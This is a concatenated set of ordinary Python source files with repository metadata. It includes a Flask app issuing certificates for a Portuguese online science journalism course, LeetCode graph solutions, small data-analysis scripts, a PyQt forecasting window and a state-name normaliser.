jornalística especializada em ciência. Está também direciona\"\n \"do ao atendimento ao exposto no edital Mídia Ciência, da FAPESP.\\n\\n\"\n \"O curso é livre e o controle das atividades é realizado por recursos na Wikimedia. \"\n \"Esta carta certifica que \"\n + name +\n \" está apto(a) a participar do curso de Introdução ao \"\n \"Jornalismo Científico.\\n\\n\"\n \"Caso requisitado, podemos emitir uma declaração de conclusão do curso, uma vez que o(a) \"\n \"participante tenha finalizado todas as leituras e tarefas.\\n\\n\"\n \"Por favor, não hesitem em entrar em contato conosco para receber outras informações a respeito \"\n \"do curso.\\n\\n\"\n \"Atenciosamente,\",\n border=0,\n align='J')\n\n #######################################################################################################\n # Footer\n #######################################################################################################\n pdf.cell(w=0, h=13, ln=1) # Give some space for the signatures\n # Fernando da Paixão signature\n pdf.image(os.path.join(app.static_folder, 'fpaixao.png'), x=37.5, y=224, w=35, h=16)\n pdf.set_y(230)\n pdf.multi_cell(w=90,\n h=6.5,\n txt=\"_____________________________________\\n\"\n \"FERNANDO JORGE DA\\nPAIXÃO FILHO\\n\\nCoordenador da equipe de\\ndifusão do CEPID NeuroMat\",\n border=0,\n align='C')\n\n # João Alexandre Peschanski signature\n pdf.image(os.path.join(app.static_folder, 'jap.png'), x=137.5, y=226, w=35, h=16)\n pdf.set_xy(110, 230)\n pdf.multi_cell(w=90,\n h=6.5,\n txt=\"_____________________________________\\n\"\n \"JOÃO ALEXANDRE\\nPESCHANSKI\\n\\nPesquisador associado\\ndo CEPID NeuroMat\",\n border=0,\n align='C')\n pdf.cell(w=0, h=5, ln=1)\n\n # Generate the file\n file = pdf.output(dest='S').encode('latin-1')\n\n response = make_response(file)\n response.headers.set('Content-Disposition', 'attachment',\n filename='IJC_Inscrição_' + name.replace(\" \", \"_\") + '.pdf')\n response.headers.set('Content-Type', 'application/pdf')\n return response\n else:\n return redirect(url_for('home'))\n\n\n# Validar documentos\n@app.route('/validate', methods=['POST', 'GET'])\ndef validate_document():\n \"\"\"\n This function verifies the validation of 
documents of the course\n\n :return: A message validating or denying a hash of a document\n \"\"\"\n username = get_username()\n\n if request.method == 'POST':\n hash_to_be_checked = request.form[\"hash\"]\n\n if hash_to_be_checked:\n users = Users.query.all()\n hashs_sub = [\n hashlib.sha1(bytes(\"Subscription \" + user.username + str(user.date_modified), 'utf-8')).hexdigest()\n for user in users]\n hashs_certificate = [\n hashlib.sha1(bytes(\"Certificate \" + user.username + str(user.date_modified), 'utf-8')).hexdigest()\n for user in users]\n\n if hash_to_be_checked in hashs_sub or hash_to_be_checked in hashs_certificate:\n message = True\n else:\n message = False\n\n return render_template('validation.html', username=username, message=message, success=True)\n else:\n return render_template('validation.html', username=username)\n else:\n return render_template('validation.html', username=username)\n\n\n# Baixar índice\n@app.route('/index', methods=['GET'])\ndef course_index():\n base_url = \"https://pt.wikiversity.org/api/rest_v1/page/pdf/Programa_de_Introdução_ao_Jornalismo_Científico\"\n\n response = make_response(requests.get(base_url).content)\n response.headers.set('Content-Disposition', 'attachment',\n filename='IJC_Programa.pdf')\n response.headers.set('Content-Type', 'application/pdf')\n return response\n\n\n# Gerar certificado\n@app.route('/generate_certificate', methods=['GET'])\ndef generate_certificate():\n \"\"\"\n This function generates a pdf file with the certificate for the course\n\n :return: A pdf file with the certificate\n \"\"\"\n username = get_username()\n\n user = Users.query.filter_by(username=username).first()\n if username and user:\n if user.can_download_certificate == \";\".join([\"T\" for i in range(app.config[\"NUMBER_OF_MODULES\"])]):\n # Create page\n pdf = CertificationPDF(orientation='L', unit='mm', format='A4')\n pdf.add_page()\n pdf.set_text_color(0, 46, 75)\n\n #######################################################################################################\n # Header\n #######################################################################################################\n pdf.set_y(20) # Start the letter text at the 10x42mm point\n\n pdf.add_font('Merriweather', '', os.path.join(app.static_folder, 'fonts/Merriweather-Regular.ttf'), uni=True)\n pdf.add_font('Merriweather-Bold', '', os.path.join(app.static_folder, 'fonts/Merriweather-Bold.ttf'), uni=True)\n pdf.set_font('Merriweather', '', 37) # Text of the body in Times New Roman, regular, 13 pt\n\n locale.setlocale(locale.LC_TIME, \"pt_BR\") # Setting the language to portuguese for the date\n pdf.cell(w=0, h=10, border=0, ln=1, align='C', txt='CERTIFICADO')\n\n pdf.set_font('Merriweather', '', 14.5)\n pdf.cell(w=0, h=10, border=0, ln=1, align='C', txt='Concedemos este certificado a')\n pdf.cell(w=0, h=10, ln=1) # New line\n\n #######################################################################################################\n # User name\n #######################################################################################################\n user = Users.query.filter_by(username=username).first()\n name = user.full_name # User full name\n pdf.set_font('Merriweather', '', 35)\n name_size = pdf.get_string_width(name)\n\n if name_size > 287:\n # Try to eliminate the prepositions\n name_split = [name_part for name_part in name.split(' ') if not name_part.islower()]\n # There's a first and last names and at least one middle name\n if len(name_split) > 2:\n first_name = name_split[0]\n 
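# first and last names stay whole; the middle names are reduced to initials below, and the font is scaled down afterwards if the result is still too wide\n                    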
last_name = name_split[-1]\n middle_names = [md_name[0]+'.' for md_name in name_split[1:-1]]\n name = first_name + ' ' + ' '.join(middle_names) + ' ' + last_name\n name_size = pdf.get_string_width(name)\n\n # Even abbreviating, there is still the possibility that the name is too big, so\n # we need to adjust it to the proper size\n if name_size > 287:\n pdf.set_font('Merriweather', '', math.floor(287 * 35 / name_size))\n\n pdf.cell(w=0, h=10, border=0, ln=1, align='C', txt=name)\n pdf.cell(w=0, h=10, ln=1) # New line\n\n #######################################################################################################\n # por ter completado as leituras e as 6 tarefas do curso online\n #######################################################################################################\n pdf.set_font('Merriweather', '', 14.5)\n pdf.cell(w=0, h=10, border=0, ln=1, align='C', txt='por ter completado as leituras e as ' +\n str(app.config[\"NUMBER_OF_MODULES\"]) +\n ' tarefas do curso online')\n\n #######################################################################################################\n # Introdução ao Jornalismo Científico\n #######################################################################################################\n pdf.set_font('Merriweather-Bold', '', 21)\n pdf.cell(w=0, h=10, border=0, ln=1, align='C', txt='Introdução ao Jornalismo Científico')\n pdf.cell(w=0, h=8, ln=1) # New line\n\n #######################################################################################################\n # Logo NeuroMat\n #######################################################################################################\n pdf.set_font('Merriweather', '', 12.5)\n pdf.set_x(50)\n y_production = pdf.get_y()\n pdf.cell(w=20, h=10, border=0, ln=0, align='L', txt='Produção:')\n y_logos = pdf.get_y()\n pdf.image(os.path.join(app.static_folder, 'neuromat.png'), x=78, y=y_production+0.6, h=8.5)\n\n #######################################################################################################\n # Logo FAPESP and WMB\n #######################################################################################################\n pdf.set_xy(155, y_production)\n pdf.cell(w=20, h=10, border=0, ln=1, align='L', txt='Apoio:')\n pdf.image(os.path.join(app.static_folder, 'fapesp.png'), x=175, y=y_production+1.1, h=7)\n pdf.image(os.path.join(app.static_folder, 'wmb.png'), x=215, y=y_production-1.1, h=13)\n\n pdf.cell(w=0, h=5, ln=1) # New line\n\n #######################################################################################################\n # Footer\n #######################################################################################################\n y_signature = pdf.get_y() # Register the \"y\" position, so the signatures are aligned\n\n # Fernando da Paixão signature\n pdf.image(os.path.join(app.static_folder, 'fpaixao.png'), x=75, y=y_signature, w=35, h=16)\n pdf.set_xy(50, y_signature+6)\n pdf.multi_cell(w=90,\n h=6.5,\n txt=\"______________________\\n\"\n \"FERNANDO JORGE DA\\nPAIXÃO FILHO\\n\\nCoordenador da equipe de\\ndifusão do CEPID NeuroMat\",\n border=0,\n align='C')\n\n # João Alexandre Peschanski signature\n pdf.image(os.path.join(app.static_folder, 'jap.png'), x=180, y=y_signature+2, w=35, h=16)\n pdf.set_xy(155, y_signature+6)\n pdf.multi_cell(w=90,\n h=6.5,\n txt=\"______________________\\n\"\n \"JOÃO ALEXANDRE\\nPESCHANSKI\\n\\nPesquisador associado\\ndo CEPID NeuroMat\",\n border=0,\n align='C')\n pdf.cell(w=0, h=10, ln=1) # New line\n 
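# switch to smaller type for the legal disclaimer paragraph that closes the certificate\n            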
pdf.set_font('Merriweather', '', 10.5)\n\n            # Text\n            pdf.set_x(25)\n            pdf.multi_cell(w=247, h=10, border=0, align='C', txt='O curso de Introdução ao Jornalismo Científico não tem um '\n                                                              'controle de registros, as leituras e tarefas são de acesso '\n                                                              'livre. Este certificado, portanto, não é reconhecido como '\n                                                              'um diploma oficial. O curso totaliza para sua realização '\n                                                              'noventa horas.')\n\n            # Generate the file\n            file = pdf.output(dest='S').encode('latin-1')\n\n            response = make_response(file)\n            response.headers.set('Content-Disposition', 'attachment',\n                                 filename='IJC_Certificado_' + name.replace(\" \", \"_\") + '.pdf')\n            response.headers.set('Content-Type', 'application/pdf')\n            return response\n        else:\n            return redirect(url_for('certificate'))\n    else:\n        return redirect(url_for('home'))\n\n\n# Generate attachments\n@app.route('/generate_attachment', methods=['GET'])\ndef generate_attachment():\n    username = get_username()\n\n    base_url = \"https://pt.wikiversity.org/api/rest_v1/page/pdf/\"\n    prefix_course = 'Introdução_ao_Jornalismo_Científico%2F'\n    pages = [\"Metodologia_e_Filosofia_da_Ciência%2FAtividade%2F\",\n             \"História_da_Ciência_e_da_Tecnologia%2FAtividade%2F\",\n             \"Ética_da_Ciência%2FAtividade%2F\",\n             \"Temas_Centrais_da_Ciência_Contemporânea%2FAtividade%2F\",\n             \"Modos_de_Organização_e_Financiamento_dos_Sistemas_de_Pesquisa,_no_Brasil_e_no_Exterior%2FAtividade%2F\",\n             \"Mídias,_Linguagens_e_Prática_do_Jornalismo_Científico%2FAtividade%2F\"]\n\n    user = Users.query.filter_by(username=username).first()\n\n    if user and user.can_download_certificate == \";\".join([\"T\" for i in range(app.config[\"NUMBER_OF_MODULES\"])]):\n        try:\n            responses = []\n            for page in pages:\n                responses.append(PdfFileReader(io.BytesIO(requests.get(base_url + prefix_course + page + user.username).content)))\n            output = io.BytesIO()\n            writer = PdfFileWriter()\n            for response in responses:\n                n = response.getNumPages()\n                for i in range(n):\n                    writer.addPage(response.getPage(i))\n\n            writer.write(output)\n            result = Response(output.getvalue(), mimetype=\"application/pdf\")\n            result.headers.set('Content-Disposition', 'attachment',\n                               filename='IJC_Anexos_' + user.full_name.replace(' ', '_') + '.pdf')\n            result.headers.set('Content-Type', 'application/pdf')\n            return result\n        except:\n            return redirect(url_for('certificate'))\n    else:\n        return redirect(url_for('certificate'))\n\n\n# Manage activities\n@app.route('/certificate', methods=['GET'])\ndef certificate():\n    username = get_username()\n\n    if request.method == 'GET':\n        if username in app.config['COORDINATORS_USERNAMES']:\n            users = Users.query.all()\n            return render_template('certificate.html',\n                                   username=username,\n                                   users=users,\n                                   coordinator=True)\n        else:\n            users = Users.query.filter_by(username=username)\n\n            if users.first():\n                can_download_certificate = all(x == \"T\" for x in users.first().can_download_certificate.split(\";\"))\n            else:\n                return redirect(url_for('subscription'))\n            return render_template('certificate.html',\n                                   username=username,\n                                   users=users,\n                                   can_download_certificate=can_download_certificate)\n    else:\n        return redirect(url_for('home'))\n\n\n# Manage activities (requested certificates only)\n@app.route('/certificate/requested', methods=['GET'])\ndef certificate_only_requested():\n    username = get_username()\n\n    if username in app.config['COORDINATORS_USERNAMES']:\n        if request.method == 'GET':\n            users = Users.query.filter_by(solicited_certificate=True)\n            return render_template('certificate.html',\n                                   username=username,\n                                   users=users,\n                                   coordinator=True)\n    else:\n        return 
redirect(url_for('certificate'))\n\n\n# Solicitar certificado\n@app.route('/solicit_certificate', methods=['GET'])\ndef solicit_certificate():\n username = get_username()\n\n user_soliciting = Users.query.filter_by(username=username).first()\n if username and user_soliciting and user_soliciting.can_download_certificate != \"T;T;T;T;T;T\" and not user_soliciting.solicited_certificate:\n user_soliciting.solicited_certificate = True\n\n status_activities = \";\".join(\n [\"NP\" if x == \"F\" else x for x in user_soliciting.can_download_certificate.split(\";\")])\n user_soliciting.can_download_certificate = status_activities\n\n try:\n db.session.commit()\n ask_coordinator_for_certificate_email(user_soliciting.username, user_soliciting.full_name)\n return redirect(url_for('certificate'))\n except:\n return 'Ocorreu um erro!'\n else:\n return redirect(url_for('certificate'))\n\n\n# Rejeitar pedido de certificação (atividades pendentes)\n@app.route('/deny_solicitation/', methods=['GET'])\ndef deny_solicitation_for_certificate(user_username):\n username = get_username()\n\n if username in app.config['COORDINATORS_USERNAMES']:\n user_denied = Users.query.filter_by(username=user_username).first()\n if user_username and user_denied:\n user_denied.solicited_certificate = False\n try:\n db.session.commit()\n return redirect(url_for('certificate'))\n except:\n return 'Ocorreu um erro!'\n else:\n return redirect(url_for('certificate'))\n\n\n# Aprovar certificação sem pedido\n@app.route('/approve_certification_without_request/', methods=['GET'])\ndef approve_certification_without_request(user_username):\n username = get_username()\n\n if username in app.config['COORDINATORS_USERNAMES']:\n user_approved = Users.query.filter_by(username=user_username).first()\n if user_username and user_approved:\n user_approved.solicited_certificate = True\n user_approved.can_download_certificate = \";\".join([\"T\" for i in range(app.config[\"NUMBER_OF_MODULES\"])])\n try:\n db.session.commit()\n return redirect(url_for('certificate'))\n except:\n return 'Ocorreu um erro!'\n else:\n return redirect(url_for('certificate'))\n\n\n# Aprovar uma atividade\n@app.route('/approve_certification//', methods=['GET'])\ndef approve_certification(user, module_activity):\n username = get_username()\n\n if username in app.config['COORDINATORS_USERNAMES'] and int(module_activity) >= 1:\n user_to_be_approved = Users.query.filter_by(username=user).first()\n\n user_modules_activities = user_to_be_approved.can_download_certificate.split(\";\")\n user_modules_activities[int(module_activity)-1] = \"T\"\n user_to_be_approved.can_download_certificate = \";\".join(user_modules_activities)\n try:\n db.session.commit()\n return redirect(url_for('certificate'))\n except:\n return 'Ocorreu um erro!'\n else:\n return redirect(url_for('certificate'))\n\n\n# Rejeitar uma atividade\n@app.route('/deny_certification//', methods=['GET'])\ndef deny_certification(user, module_activity):\n username = get_username()\n\n if username in app.config['COORDINATORS_USERNAMES']:\n user_to_be_approved = Users.query.filter_by(username=user).first()\n\n user_modules_activities = user_to_be_approved.can_download_certificate.split(\";\")\n user_modules_activities[int(module_activity)-1] = \"F\"\n user_to_be_approved.can_download_certificate = \";\".join(user_modules_activities)\n try:\n db.session.commit()\n return redirect(url_for('certificate'))\n except:\n return 'Ocorreu um erro!'\n else:\n return redirect(url_for('certificate'))\n\n\ndef get_revision_ids(data):\n 
return_list = {}\n for elem in data['query']['pages']:\n title = data['query']['pages'][elem]['title']\n if 'revisions' in data['query']['pages'][elem]:\n revid = str(data['query']['pages'][elem]['revisions'][0]['revid'])\n link = 'https://pt.wikiversity.org/w/index.php?title='+title+'&oldid='+revid\n return_list[title] = link, True\n else:\n return_list[title] = 'https://pt.wikiversity.org/w/index.php?title='+title+'&action=edit&redlink=1', False\n return return_list\n\n\ndef get_content(data):\n return_list = {}\n for elem in data['query']['pages']:\n title = data['query']['pages'][elem]['title']\n if 'revisions' in data['query']['pages'][elem]:\n content = str(data['query']['pages'][elem]['revisions'][0]['*'])\n return_list[title] = content\n else:\n return_list[title] = ''\n return return_list\n\n\n# Enviar email\ndef ask_coordinator_for_certificate_email(username, fullname):\n email_sender = app.config[\"GMAIL_EMAIL\"]\n email_password = app.config[\"GMAIL_PASSWORD\"]\n email_receiver = app.config[\"GMAIL_COORDINATOR_EMAIL\"]\n\n subject = \"{fullname} ({username}) está solicitando um certificado do curso de Introdução ao Jornalismo Científico\"\n body = \"\"\"Olá, {coordinator},

O(A) estudante {fullname}, cujo nome de usuário é {username}, está solicitando que suas atividades do curso Introdução ao Jornalismo Científico sejam avaliadas e lhe seja garantido o certificado de conclusão do curso.

Você pode verificar este(a) e outros(as) estudantes com avaliações pendentes em {url}.

Introdução ao Jornalismo Científico
Solicitações de certificados | ijc.toolforge.org\"\"\"\n\n em = EmailMessage()\n em[\"From\"] = formataddr((str(Header(app.config[\"GMAIL_EMAIL_HEADER\"], 'utf-8')), email_sender))\n em[\"To\"] = \", \".join(email_receiver)\n em[\"Subject\"] = subject.format(fullname=fullname, username=username)\n formatted_body = body.format(fullname=fullname,\n username=username,\n url=url_for(\"certificate_only_requested\", _external=True),\n url_home=url_for(\"home\", _external=True),\n coordinator=\" e \".join([\", \".join(app.config[\"COORDINATORS_USERNAMES\"][:-1]), app.config[\"COORDINATORS_USERNAMES\"][-1]]))\n em.set_content(MIMEText(formatted_body, \"html\"))\n\n context = ssl.create_default_context()\n with smtplib.SMTP_SSL('smtp.gmail.com', 465, context=context) as smtp:\n smtp.login(email_sender, email_password)\n smtp.sendmail(email_sender, email_receiver, em.as_string())\n\n\nif __name__ == '__main__':\n app.run()\n\n","repo_name":"WikiMovimentoBrasil/ijc","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":36245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6057757038","text":"# my BFS solution. unexplicably won't pass, but passes on vscode and pythontutor...\nimport collections\nclass Solution:\n def networkDelayTime(self, times, n, k) -> int:\n seenTimes = {}\n edges = collections.defaultdict(list)\n \n for edge in times:\n edges[edge[0]].append((edge[1], edge[2]))\n \n q = collections.deque([[k, 0]])\n seenTimes[k] = 0\n while q:\n location, time = q.popleft()\n seenTimes[location] = min(seenTimes.get(location, float('inf')), time)\n while edges[location]:\n edge = edges[location].pop()\n q.append([edge[0], edge[1] + time])\n \n minTime = 0\n for location in seenTimes:\n minTime = max(minTime, seenTimes[location])\n \n return minTime if len(seenTimes) == n else -1\n \ntimes = [[2,1,47],[3,5,46],[4,1,6],[5,4,7],[4,5,19],[3,2,18],[1,2,0],[5,1,25],[2,5,58]]\ntest = Solution()\nprint(test.networkDelayTime(times, 5, 3))\n\n# SPFA\nclass Solution:\n def networkDelayTime(self, times: List[List[int]], n: int, k: int) -> int:\n seenTimes = [float('inf') for _ in range(n)]\n seenTimes[k-1] = 0\n weight = collections.defaultdict(dict)\n for frm, to, time in times:\n weight[frm][to] = time\n q = collections.deque([k])\n while q:\n frm = q.popleft()\n for to in weight[frm]:\n if seenTimes[frm-1] + weight[frm][to] < seenTimes[to-1]:\n seenTimes[to-1] = seenTimes[frm-1] + weight[frm][to]\n q.append(to)\n return max(seenTimes) if max(seenTimes) < float('inf') else -1\n\n# Bellman-Ford algo - pretty fast after adding the flag. 
also uses minimal space compared to others\nclass Solution:\n def networkDelayTime(self, times: List[List[int]], n: int, k: int) -> int:\n seenTimes = [float('inf') for _ in range(n)]\n seenTimes[k-1] = 0\n for _ in range(n):\n flag = 1\n for frm, to, time in times:\n if seenTimes[frm-1] + time < seenTimes[to-1]:\n seenTimes[to-1] = seenTimes[frm-1] + time\n flag = 0\n if flag:\n break\n return max(seenTimes) if max(seenTimes) < float('inf') else -1\n\n# dijkstra's - efficient version\nclass Solution:\n def networkDelayTime(self, times: List[List[int]], n: int, k: int) -> int:\n graph = defaultdict(list)\n for src, dst, c in times:\n graph[src].append((dst, c)) \n \n \n queue = [(0, k)] #(cost, node)\n visited = set()\n max_cost = 0\n \n while queue:\n \n #Always pop the min value\n cost, node = heapq.heappop(queue)\n \n if node in visited:\n continue\n \n visited.add(node)\n \n max_cost = max(max_cost, cost)\n\n neighbours = graph[node]\n \n for neighbour in neighbours:\n \n new_node, new_cost = neighbour\n \n if new_node not in visited:\n \n curr_cost = cost + new_cost\n \n heapq.heappush(queue, (curr_cost, new_node))\n \n\n return max_cost if len(visited) == n else -1","repo_name":"farrellas/leetcode_solutions","sub_path":"network_delay_time.py","file_name":"network_delay_time.py","file_ext":"py","file_size_in_byte":3399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25710926629","text":"# Author: James Anderson\n# EAI Coding Challenge: Address Book\n\n#A container for contact information\nclass Contact:\n def __init__(self, name, address='', phone_number='', email_address=''):\n self.name = name\n self.address = address\n self.email_address = email_address\n self.phone_number = phone_number\n","repo_name":"snaco/AddressBookEAI","sub_path":"Contact.py","file_name":"Contact.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3650841694","text":"import numpy\r\nfrom PyQt5 import QtWidgets\r\nfrom PyQt5.QtWidgets import QTableWidgetItem, QRadioButton, QButtonGroup\r\n\r\nimport pyqtgraph as pg\r\nfrom ui import prognosticwin\r\nfrom win import Win\r\nfrom localBD.bdcontroller import BdController\r\nfrom dataprepare import DataPreparator\r\nfrom PyQt5 import QtCore\r\n\r\n\r\nclass BasePrognose(Win, prognosticwin.Ui_Prognosis):\r\n def __init__(self, mainwindow):\r\n super().__init__(mainwindow=mainwindow)\r\n self.db = BdController()\r\n self.preparator = DataPreparator()\r\n\r\n self.listOptions = []\r\n self.listApps = []\r\n\r\n apps, options = self.preparator.forPrognosticWindow(self.db.read_market(), self.db.read_options())\r\n\r\n self.tableApps.setColumnCount(1)\r\n self.tableApps.setRowCount(len(apps))\r\n self.tableApps.setHorizontalHeaderLabels(['Applications'])\r\n self.tableApps.setColumnWidth(0, 250)\r\n for i in range(len(apps)):\r\n for j in range(1):\r\n chkBoxItem = QTableWidgetItem()\r\n chkBoxItem.setFlags(QtCore.Qt.ItemIsUserCheckable | QtCore.Qt.ItemIsEnabled)\r\n chkBoxItem.setCheckState(QtCore.Qt.Unchecked)\r\n chkBoxItem.setText(apps[i])\r\n self.tableApps.setItem(i, j, chkBoxItem)\r\n self.tableApps.itemClicked.connect(self.handleItemClickedApps)\r\n\r\n self.tableOptions.setColumnCount(1)\r\n self.tableOptions.setRowCount(len(options))\r\n self.tableOptions.setHorizontalHeaderLabels(['Options'])\r\n self.tableOptions.setColumnWidth(0, 250)\r\n for i in range(len(options)):\r\n for j in range(1):\r\n 
chkBoxItem = QTableWidgetItem()\r\n chkBoxItem.setFlags(QtCore.Qt.ItemIsUserCheckable | QtCore.Qt.ItemIsEnabled)\r\n chkBoxItem.setCheckState(QtCore.Qt.Unchecked)\r\n chkBoxItem.setText(options[i])\r\n self.tableOptions.setItem(i, j, chkBoxItem)\r\n self.tableOptions.itemClicked.connect(self.handleItemClickedOptions)\r\n\r\n self.prognoseButton.clicked.connect(self.make_prognose)\r\n\r\n def make_prognose(self):\r\n timesteps = 7\r\n data = self.db.read_market()\r\n\r\n for app in self.listApps:\r\n mainset = []\r\n for opt in self.listOptions:\r\n set = self.preparator.prepare_prognose(data, app, opt, timesteps)\r\n set = numpy.array(set)\r\n set = set.reshape(1, timesteps, 1)\r\n y = []\r\n x = []\r\n\r\n model = self.db.read_model(opt)\r\n for i in range(100):\r\n set = model.predict(set)\r\n x.append(i)\r\n y.append(set[0][len(set)-1][0])\r\n mainset.append(y)\r\n\r\n pg.setConfigOption('background', 'w')\r\n pg.setConfigOption('foreground', 'k')\r\n pw = pg.plot(x, y, pen='g')\r\n\r\n model = self.db.read_model('main')\r\n ms = []\r\n for i in range(len(mainset[0])):\r\n mms = []\r\n for j in range(len(mainset)):\r\n mms.append(mainset[j][i])\r\n ms.append(mms)\r\n s1 = len(ms)\r\n s2 = len(ms[0])\r\n ms = numpy.array(ms)\r\n ms = ms.reshape(s1, s2)\r\n y = model.predict(ms)\r\n yp = []\r\n for y1 in y:\r\n yp.append(self.preparator.transform_y_dense(y1))\r\n x = range(0, len(yp))\r\n pg.setConfigOption('background', 'w')\r\n pg.setConfigOption('foreground', 'k')\r\n pw = pg.plot(x, yp, pen='g')\r\n print(yp[0])\r\n\r\n\r\n\r\n\r\n def handleItemClickedOptions(self, item):\r\n if item.checkState() == QtCore.Qt.Checked:\r\n self.listOptions.append(item.text())\r\n else:\r\n try:\r\n self.listOptions.remove(item.text())\r\n except:\r\n pass\r\n\r\n def handleItemClickedApps(self, item):\r\n if item.checkState() == QtCore.Qt.Checked:\r\n self.listApps.append(item.text())\r\n else:\r\n try:\r\n self.listApps.remove(item.text())\r\n except:\r\n pass","repo_name":"BurlakaR/diploma","sub_path":"prognosticcontroller.py","file_name":"prognosticcontroller.py","file_ext":"py","file_size_in_byte":4241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21194343814","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Aug 16 15:41:47 2019\n\n@author: dchhitarka\n\nImport Bahubali2vsDangal.csv file.\n\nIt contains Data of Day wise collections of the movies Bahubali 2 and Dangal (in crores) for the first 9 days. 
\nNow, you have to write a python code to predict which movie would collect more on the 10th day.\n\"\"\"\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\ndf = pd.read_csv('Bahubali2_vs_Dangal.csv')\ndf.isnull().any(axis=0)\ndf.columns\n#x = df['Days']\n#yb = df['Bahubali_2_Collections_Per_day']\n#yd = df['Dangal_collections_Per_day']\ndays = df[['Days']]\nbahu = df.iloc[:,1]\ndang = df.iloc[:,2]\n\n\nfrom sklearn.linear_model import LinearRegression\n\nlb = LinearRegression()\nlb.fit(days, bahu)\n\nldang = LinearRegression()\nldang.fit(days, dang)\n\nldang.predict(np.array(10).reshape(-1,1))\n\nlb.predict(np.array(10).reshape(-1,1))\n","repo_name":"dchhitarka/machinelearning","sub_path":"Inhouse Internship/baha2_vs_dangal.py","file_name":"baha2_vs_dangal.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26533289042","text":"from setuptools import setup\n\nVERSION = '0.0.1'\nDESCRIPTION = 'Simple python module'\nLONG_DESCRIPTION = 'A package that prints hello world'\n\n# Setting up\nsetup(\n name=\"greetmsg\",\n version=VERSION,\n author=\"Ankush Bhawar\",\n author_email=\"\",\n description=DESCRIPTION,\n long_description_content_type=\"text/markdown\",\n long_description=LONG_DESCRIPTION,\n keywords=['python', 'video', 'stream', 'video stream', 'camera stream', 'sockets'],\n classifiers=[\n \"Development Status :: 1 - Planning\",\n \"Intended Audience :: Developers\",\n \"Programming Language :: Python :: 3\",\n \"Operating System :: Unix\",\n \"Operating System :: MacOS :: MacOS X\",\n \"Operating System :: Microsoft :: Windows\",\n ]\n)","repo_name":"ankush-bhawar07/greetmsg","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21606309424","text":"# Python Program to print Prime Numbers from 1 to 100\n\nfor i in range(1, 101):\n count = 0\n for j in range(2, (i // 2 + 1)):\n if i % j == 0:\n count = count + 1\n break\n\n if count == 0 and i != 1:\n print(\" %d\" % i, end=' ')\n","repo_name":"pujac0608/AutomationPython","sub_path":"PracticePythonCode/primeNumbers.py","file_name":"primeNumbers.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38791767077","text":"from typing import Dict, Optional\nimport pathlib\nimport re\n\nimport yaml\n\nARTIFACTS_DIR = pathlib.Path(__file__).parent.absolute() / \"artifacts\"\n\n\ndef read_us_state_clean_mapping() -> Dict:\n\n with open(ARTIFACTS_DIR / \"us_state_codes.yaml\", \"r\") as f:\n us_state_codes = yaml.safe_load(f)\n\n us_state_codes_prefixed = {f\"US-{k}\": v for k, v in us_state_codes.items()}\n\n us_state_upper = {v.upper(): v for _, v in us_state_codes.items()}\n\n with open(ARTIFACTS_DIR / \"us_state_misspellings.yaml\", \"r\") as f:\n us_state_misspellings = yaml.safe_load(f)\n\n us_state_clean_mapping = dict(\n list(us_state_codes.items())\n + list(us_state_codes_prefixed.items())\n + list(us_state_upper.items())\n + list(us_state_misspellings.items())\n )\n\n return us_state_clean_mapping\n\n\nUS_STATE_CLEAN_MAPPING = read_us_state_clean_mapping()\n\n\ndef standardise_state(raw_us_state: Optional[str]) -> Optional[str]:\n \"\"\"\n This method standardises the US state string and corrects misspellings.\n Ideally, however this process should sit in the 
application layer than here (users shouldn't\n be allowed to enter e.g. Los Angeles in the state field).\n \"\"\"\n\n if raw_us_state == None:\n return None\n\n us_state = re.sub(\"\\s+\", \" \", raw_us_state).strip().replace(\".\", \"\").upper()\n\n return US_STATE_CLEAN_MAPPING.get(us_state)\n","repo_name":"antyan001/blockchain-mle-task","sub_path":"blockchain_task/preprocessing/address.py","file_name":"address.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1108200075","text":"import sys\nsys.stdin = open('input.txt')\n\ndx = [-1, 1, 0, 0]\ndy = [0, 0, -1, 1]\n\ndef check(nx, ny):\n if 0 <= nx < N and 0 <= ny < N:\n return True\n else:\n return False\n\ndef DFS(x, y, cnt, num):\n stack = []\n stack.append((x, y, cnt, num))\n\n while stack:\n x, y, cnt, num = stack.pop()\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n\n # 벽체크, 다음 위치가 내 위치보다 1클때만\n # 다음 위치가 내 위치보다 1 클때만 이동할 것이므로\n # 별도의 방문처리 필요 없음\n if check(nx, ny) and arr[nx][ny] == arr[x][y]+1:\n # 현재까지의 각 방들의 합을 num에 할당\n num += arr[nx][ny]\n # 다음 위치 조사\n stack.append((nx, ny, cnt+1, num))\n return cnt, num\n\n\n\nT = int(input())\n\nfor tc in range(1, T+1):\n N = int(input())\n arr = [list(map(int, input().split())) for _ in range(N)]\n # 최종 결과 초기화\n # 출발 위치, 방문한 방의 개수, 각 방들의 숫자 합\n result = [0, 0, 0]\n\n # 전체 위치에서 조회\n for x in range(N):\n for y in range(N):\n cnt, num = DFS(x, y, 1, arr[x][y])\n # 방문한 방의 개수가 더 많다면\n if result[1] < cnt:\n # 최종 결과 변경\n result = [arr[x][y], cnt, num]\n # 방문한 개수가 같고, 각 방의 합이 현재 값보다 작을때만\n elif result[1] == cnt and result[2] > num:\n # 변경\n result = [arr[x][y], cnt, num]\n\n print(f'#{tc} {result[0]} 